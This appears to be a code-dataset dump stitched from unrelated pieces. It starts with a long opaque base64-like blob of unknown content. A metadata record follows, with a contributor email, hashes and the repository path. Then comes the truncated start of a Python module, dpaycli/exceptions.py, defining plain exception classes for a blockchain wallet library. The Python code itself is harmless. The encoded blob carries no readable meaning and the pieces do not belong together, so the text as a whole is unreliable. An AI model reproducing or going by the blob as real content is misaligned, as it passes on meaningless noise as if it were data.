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
oDNuI3QbmdzvZv84kfDYo0uBFAi1wCEl0suggGzJAZ58J0VKVswvJpOoovppJHSZ
cgu8dGxQJahaKSO2tdYMnQ+E4ztZbu1wINMfEg9VfXoL+kWuo7/vg78sXuqzD8Fd
cOoBoj2RLazqUgH+lnINV9P/ZlRRLURFKg1pRe95JsD+qqr1/vyKg+0FeT4s2Ndb
qzqA4vBrM31uL0cooIa64OfG3plMp22HRiQoNNieu033PSH8lEFyc1x4MsaVMp/x
R+2Qw4Qir5cradz+BUh+GQtdV1XL8IEy6pfnY4THgFJd5OWiYevPh+DzB/wmgZX1
m44fCZtUHLRFsN9Than/kH2gA8ouCFirR++SGG24PUVBAGKrMN4zq24hsURpnBcS
a9tkod8HDEtXbcwXH9/j4ANcZlulXBumVoz9QjaXazH+3Kges4+8WDCm+igpndW4
hb/10luS7lx3G2iNx6YQ9f8MKRsHH7MpTThFwLxCA/OZwOF14uTn9pQpBxw5yPcP
r9fQg4UhEnjXl+H5Q/HkXnYzgYdmJ2Gcx4fmawRfa9q9gxfBn8m/QEuiu9fQrUdB
bOCifOXE2NmDqGZPSZSZOEdF7od8WjJDwz4+h4BNkOwu566dXWfGdlerLZCoy4vP
3jus5EcesB25k2wE42DZEDPEuT45+m++Hl35XtH5pBIDzgSzFNkMemlm8FfFDrB7
+A6Bj1ToHUnAyY1kCbKK6GwrcPDu/jfkqvt+IAjuqRgT4n6FqFerJM5u8izJLRqh
grP0JU9W4Kfked09+SvU0vV6WK/DlVaBrFNvuUYEAcFIubsO0fJzQZXndTtCpwA4
0Yr97SEu9thtDWvfhvOoFHm7IwUTAbX/s0eQ2yyQsjBrLVrz+sZJ6aZoxgNljg1X
9VOrWcQVqykDqkWSr1k2ifZtElwU7xQri9yja0VZvfckWeNcSjlMQqaLVvzJ2bmk
s5aKq2jmAIFsbHKllFoVdNelnJnjkSd7F9TA2cuEyW/dsewRJrtTcjp/xtBL+XdR
x4OTSRbSO5ZvlcXSmSVA5NnWWlq0wz2gtBuZ+pQRga+4sFsxEEgfHYRKSzK0AwYo
8jSOsfZWUifoUkrZZfoCSPAS2Gh4QbFfeV/PKbp/ziSLSamoRLVnEhpfgcvqdUc0
3esOyJa+S3tE3oRV7nnE51O1kdDy2PfifqLtIcHY1lgT/x0ba0OhF6+F0Et9a274
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
|
[
"kfidler6@gatech.edu"
] |
kfidler6@gatech.edu
|
61d2fc0ef44c6b1c5dfaf62f9463947621867fc9
|
a22cc323b29f50da397d8363ac2521e3542a0fd7
|
/dpaycli/exceptions.py
|
bae39e29196bee7aae8c59769ed5783a861fb228
|
[
"MIT"
] |
permissive
|
dpays/dpay-cli
|
1a58c7dae45218e3b05b7e17ff5ce03e918d27b9
|
dfa80898e1faea2cee92ebec6fe04873381bd40f
|
refs/heads/master
| 2020-04-01T09:26:43.200933
| 2018-10-15T08:03:06
| 2018-10-15T08:03:06
| 153,075,154
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,993
|
py
|
# This Python file uses the following encoding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
class WalletExists(Exception):
""" A wallet has already been created and requires a password to be
unlocked by means of :func:`dpay.wallet.unlock`.
"""
pass
class WalletLocked(Exception):
""" Wallet is locked
"""
pass
class RPCConnectionRequired(Exception):
""" An RPC connection is required
"""
pass
class InvalidMemoKeyException(Exception):
""" Memo key in message is invalid
"""
pass
class WrongMemoKey(Exception):
""" The memo provided is not equal the one on the blockchain
"""
pass
class OfflineHasNoRPCException(Exception):
""" When in offline mode, we don't have RPC
"""
pass
class AccountExistsException(Exception):
""" The requested account already exists
"""
pass
class AccountDoesNotExistsException(Exception):
""" The account does not exist
"""
pass
class AssetDoesNotExistsException(Exception):
""" The asset does not exist
"""
pass
class InvalidAssetException(Exception):
""" An invalid asset has been provided
"""
pass
class InsufficientAuthorityError(Exception):
